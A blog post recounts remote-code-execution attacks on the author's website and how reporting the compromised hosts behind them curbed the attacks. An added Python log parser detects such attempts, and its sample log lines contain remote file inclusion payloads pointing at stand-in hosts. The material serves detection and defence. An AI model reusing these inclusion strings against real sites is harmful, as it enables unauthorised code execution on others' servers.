Turning the tables on hackers

Every dark cloud has a silver lining, and the recent hacker attacks on MT.Net are no exception. Once I had safely reassembled the website and taken measures against active attacks, I realized what risk hackers run when they attempt remote code execution attacks like the one they ran on my site: they expose the location of their hacker code!

After repelling a couple of attacks per day, I got wise and began to contact the owners of the websites used to attack my site, politely letting them know their servers had been compromised. After doing this for five or so websites, the hacker attacks against my site all but dried up! Perhaps I hit a nerve?

It’s still usually not worth the trouble to track hackers back to their original IP addresses (or at least, not worth the trouble for anyone lacking search warrant power), but taking away a few of a hacker’s precious hideouts sends a message that messing with me comes at a cost.
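The exposed locations described above can be collected from the web server's access log and grouped by host, which gives the list of site owners to notify. This is an added example, not the author's code; it assumes Apache combined log format and that the attack requests carried the remote URL in a query parameter, and the log lines, hosts and addresses are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines (Apache combined log format assumed; not real traffic).
SAMPLE_LOG = '''\
198.51.100.7 - - [10/Oct/2023:06:25:11 +0000] "GET /index.php?page=http://compromised.example/img/x.txt? HTTP/1.1" 404 512 "-" "ExampleBot/1.0"
198.51.100.9 - - [10/Oct/2023:07:02:40 +0000] "GET /blog/?p=42 HTTP/1.1" 200 8120 "http://search.example/?q=mt" "Mozilla/5.0"
203.0.113.20 - - [10/Oct/2023:09:14:03 +0000] "GET /wp/index.php?inc=hTTp%3A%2F%2Fcompromised.example%2Fimg%2Fx.txt%3F HTTP/1.1" 404 512 "-" "ExampleBot/1.0"
203.0.113.21 - - [11/Oct/2023:01:44:59 +0000] "GET /index.php?page=ftp://files.example.net/pub/r.txt HTTP/1.0" 403 210 "-" "-"
'''

# Captures: client address, timestamp, request target, response status.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+)[^"]*" (\d{3})')
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.I)

def remote_includes(log_text):
    """Group requests whose query parameters point at an external URL, by host."""
    found = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        client, when, target, status = m.groups()
        # parse_qsl percent-decodes values, so encoded URLs are caught as well.
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            if not REMOTE_RE.match(value.strip()):
                continue
            u = urlsplit(value.strip())  # lowercases scheme and hostname
            if not u.hostname:
                continue
            url = f"{u.scheme}://{u.hostname}{u.path}"
            found[u.hostname].append((when, client, name, url, status))
    return dict(found)

def report(found):
    """One evidence line per host, suitable for a notice to the site owner."""
    lines = []
    for host, hits in sorted(found.items()):
        urls = ", ".join(sorted({h[3] for h in hits}))
        lines.append(f"{host}: {len(hits)} request(s) referencing {urls}")
    return lines

if __name__ == "__main__":
    print("\n".join(report(remote_includes(SAMPLE_LOG))))
```

The referer field is deliberately ignored, so ordinary inbound links from other sites are not reported as hosting attack code.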

Blogging and hackers

I found the Stop Forum Spam site this morning when watching l0ser bots try to register accounts on MT.Net. A Google search on an email address used by an obvious bot brought me to the site. There’s an API for automated rejection of these fake user accounts which I’m thinking of using to head off many of the hacker attacks I’ve seen. I’m thinking blocking attacks at the Apache level would be ideal.

On another note, it looks like my WordPress hack post has become very popular with both hackers and webmasters alike. Hackers frequently use its URL to attempt cross-site scripting attacks against my machine, while webmasters point to it as one of the first public announcements of a critical WordPress vulnerability. Kudos again to MT.Net reader Scootdawg for being the first to see my blog wasn’t working!

On yet another note, I’m thinking of writing a screenplay where a lowly blogger disses the reclusive dictator of a backwards Asian country and becomes an unwilling “guest” of the dictator for a bizarre weekend.